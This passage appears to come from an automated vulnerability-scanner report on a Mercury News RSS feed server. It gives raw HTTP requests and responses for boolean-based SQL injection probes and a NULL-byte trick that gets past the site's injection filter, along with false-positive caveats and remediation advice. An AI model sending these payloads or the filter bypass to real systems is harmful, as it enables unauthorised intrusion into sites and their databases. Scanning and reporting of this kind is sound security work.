<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss'%20and%201%3d1--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss'%20and%201%3d2--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close
1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://feeds.mercurynews.com
Path: /mngi/rss/CustomRssServlet/568/200729.xml
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18085221%20or%201%3d1--%20 and 18085221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d1--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:37 GMT
Content-Length: 23879
Connection: close
X-N: S
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link href="http://fee ...[SNIP]... <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1111/20101111__quakes~1.JPG" length="154740" type="image/pjpeg"/> </item> <item> <title><![CDATA[Quakes owner: New stadium in about two years]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid> <description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate> </item> <item> <title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid> <description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate> <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg" length="36852" type="image/pjpeg"/> </item> <item> <title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York]]></title ...[SNIP]...
Request 2
GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d2--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 23889
Connection: close
X-N: S
<?xml version="1.0" encoding="UTF-8"?> <rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link href="http://fee ...[SNIP]... <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1104/20101104_091315_11.4.quakeslisting.jpg" length="0" type="image/jpeg"/> </item> <item> <title><![CDATA[Quakes owner: New stadium in about two years]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid> <description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate> </item> <item> <title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title> <link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link> <guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid> <description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description> <dc:creator><p class="bylinejb">By Elliott Almond<br /></p><p class="bylineaffiliation"><a href='mailto:ealmond@mercurynews.com'>ealmond@mercurynews.com</a></dc:creator> <pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate> <enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg" length="36852" type="image/pjpeg"/> </item> <item> <title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 55498630%20or%201%3d1--%20 and 55498630%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d1--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:33 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d2--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:33 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:41 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:41 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:04 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:04 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15112565%20or%201%3d1--%20 and 15112565%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d1--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d2--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:01 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200743.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:02 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 62668673%20or%201%3d1--%20 and 62668673%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d1--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:07 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56862668673%20or%201%3d2--%20/200744.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:07 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
